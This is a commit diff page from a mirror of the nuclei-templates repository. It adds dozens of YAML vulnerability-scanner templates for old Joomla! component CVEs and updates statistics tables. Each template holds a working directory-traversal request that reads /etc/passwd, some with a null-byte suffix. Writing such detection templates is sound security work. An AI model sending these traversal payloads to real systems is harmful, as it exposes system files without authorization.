daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CVE-2021-1497

patch-1
sandeep 2021-10-02 05:18:04 +05:30
parent 2e8bba24a5 0b99d0f3d7
commit aec246bf5b
118 changed files with 18632 additions and 904 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.github/workflows/templates-stats.yml vendored
View File

@ -1,9 +1,6 @@
name: 🗒 Templates Stats
on:
create:
tags:
- v*
workflow_dispatch:
jobs:

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 |
| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 |
| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 |
| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 |
| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | |
| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
| rce | 198 | gy741 | 72 | takeovers | 64 | | | | |
| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | |
| cve2020 | 164 | madrobot | 61 | file | 46 | | | | |
| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | |
| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 |
| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 |
| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 |
| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 |
| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | |
| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
| rce | 200 | gy741 | 77 | takeovers | 64 | | | | |
| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | |
| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | |
| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | |
**166 directories, 2144 files**.
**166 directories, 2231 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1609
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

18
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 739 | pikpikcu | 273 | cves | 739 | info | 650 | http | 1991 |
| lfi | 266 | dhiyaneshdk | 268 | vulnerabilities | 307 | high | 560 | file | 46 |
| panel | 252 | daffainfo | 217 | exposed-panels | 250 | medium | 456 | network | 42 |
| xss | 248 | pdteam | 195 | technologies | 192 | critical | 276 | dns | 12 |
| wordpress | 235 | geeknik | 154 | exposures | 188 | low | 154 | | |
| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 |
| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 |
| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 |
| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 |
| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | |
| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
| rce | 200 | gy741 | 76 | takeovers | 64 | | | | |
| tech | 183 | pussycat0x | 69 | default-logins | 56 | | | | |
| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | |
| wp-plugin | 161 | madrobot | 61 | workflows | 37 | | | | |
| rce | 200 | gy741 | 77 | takeovers | 64 | | | | |
| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | |
| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | |
| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | |

11
network/deprecated-sshv1-detection.yaml → cves/2001/CVE-2001-1473.yaml
View File

@ -1,14 +1,19 @@
id: deprecated-sshv1-detection
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: medium
tags: network,ssh,openssh
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310
network:
- host:

27
cves/2007/CVE-2007-4504.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6080.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6222.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-1496.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-2015.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-2100.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-3053.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-3318.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-4202.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-4679.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0157.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
cves/2010/CVE-2010-0467.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cve-id: CVE-2010-0467
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0696.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0759.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0942.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0972.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0982.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1056.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1081.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1217.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1302.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1340.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1461.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1461
info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1469.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1469
info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1478.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1478
info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1491.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1491
info:
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1540.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1603.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1603
info:
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12284
- https://www.cvedetails.com/cve/CVE-2010-1603
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1653.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1653
info:
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12430
- https://www.cvedetails.com/cve/CVE-2010-1653
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1658.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1715.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

11
vulnerabilities/lsoft/listserv_maestro_rce.yaml → cves/2010/CVE-2010-1870.yaml
View File

@ -1,14 +1,19 @@
id: maestro-unauth-rce
id: CVE-2010-1870
info:
name: ListSERV Maestro <= 9.0-8 RCE
author: b0yd
severity: info
description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
tags: rce,listserv,ognl
tags: rce,listserv,ognl,cves,cve2010
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N
cvss-score: 5.0
cve-id: CVE-2010-1870
cwe-id: CWE-917
requests:
- method: GET

27
cves/2010/CVE-2010-1873.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1873
info:
name: Joomla! Component Jvehicles - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
reference:
- https://www.exploit-db.com/exploits/11997
- https://www.cvedetails.com/cve/CVE-2010-1873
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
